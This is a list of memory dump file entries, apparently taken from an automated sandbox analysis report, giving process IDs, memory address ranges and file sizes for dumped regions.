memory/6020-214-0x0000000000000000-mapping.dmp
-
memory/6020-235-0x00000000006A0000-0x00000000010A4000-memory.dmpFilesize
10.0MB
-
memory/6028-300-0x0000000000400000-0x00000000005AB000-memory.dmpFilesize
1.7MB
-
memory/6028-282-0x0000000000400000-0x00000000005AB000-memory.dmpFilesize
1.7MB
-
memory/6028-200-0x0000000000000000-mapping.dmp
-
memory/6036-281-0x0000000000C30000-0x00000000015C6000-memory.dmpFilesize
9.6MB
-
memory/6036-328-0x0000000000C30000-0x00000000015C6000-memory.dmpFilesize
9.6MB
-
memory/6036-378-0x0000000077730000-0x00000000778D3000-memory.dmpFilesize
1.6MB
-
memory/6036-230-0x0000000000C30000-0x00000000015C6000-memory.dmpFilesize
9.6MB
-
memory/6036-275-0x0000000077730000-0x00000000778D3000-memory.dmpFilesize
1.6MB
-
memory/6036-213-0x0000000000000000-mapping.dmp
-
memory/6044-215-0x0000000000000000-mapping.dmp
-
memory/6044-381-0x0000000077730000-0x00000000778D3000-memory.dmpFilesize
1.6MB
-
memory/6044-246-0x00000000007C0000-0x000000000111E000-memory.dmpFilesize
9.4MB
-
memory/6044-278-0x0000000077730000-0x00000000778D3000-memory.dmpFilesize
1.6MB
-
memory/6044-280-0x00000000007C0000-0x000000000111E000-memory.dmpFilesize
9.4MB
-
memory/6056-201-0x0000000000000000-mapping.dmp
-
memory/6064-202-0x0000000000000000-mapping.dmp
-
memory/6064-228-0x0000000000180000-0x00000000001C1000-memory.dmpFilesize
260KB
-
memory/6072-203-0x0000000000000000-mapping.dmp
-
memory/10216-348-0x0000000000000000-mapping.dmp
-
memory/14996-325-0x0000000000000000-mapping.dmp
-
memory/21564-394-0x0000000000000000-mapping.dmp
-
memory/27816-255-0x0000000000000000-mapping.dmp
-
memory/27816-443-0x0000000002780000-0x0000000002862000-memory.dmpFilesize
904KB
-
memory/27816-438-0x0000000002570000-0x0000000002695000-memory.dmpFilesize
1.1MB
-
memory/27816-273-0x00000000021E0000-0x000000000233E000-memory.dmpFilesize
1.4MB
-
memory/45648-295-0x0000000000000000-mapping.dmp
-
memory/51464-442-0x0000000000000000-mapping.dmp
-
memory/59600-333-0x0000000000000000-mapping.dmp
-
memory/59600-383-0x00000000035B0000-0x0000000003804000-memory.dmpFilesize
2.3MB
-
memory/59760-423-0x0000000000000000-mapping.dmp
-
memory/59796-430-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/59796-424-0x0000000000000000-mapping.dmp
-
memory/66408-344-0x0000000000000000-mapping.dmp
-
memory/71640-407-0x0000000000000000-mapping.dmp
-
memory/72496-340-0x0000000000000000-mapping.dmp
-
memory/73588-357-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-303-0x0000000000000000-mapping.dmp
-
memory/73588-363-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-361-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-359-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-324-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-305-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-354-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-327-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-330-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-334-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-343-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-352-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-347-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-338-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73588-367-0x0000000000D20000-0x0000000000D74000-memory.dmpFilesize
336KB
-
memory/73612-309-0x0000000000000000-mapping.dmp
-
memory/73644-299-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/73644-284-0x0000000000000000-mapping.dmp
-
memory/73644-286-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/73696-293-0x0000000000000000-mapping.dmp
-
memory/73696-297-0x0000000000710000-0x000000000076F000-memory.dmpFilesize
380KB
-
memory/73724-285-0x0000000000730000-0x0000000000758000-memory.dmpFilesize
160KB
-
memory/73724-283-0x0000000000000000-mapping.dmp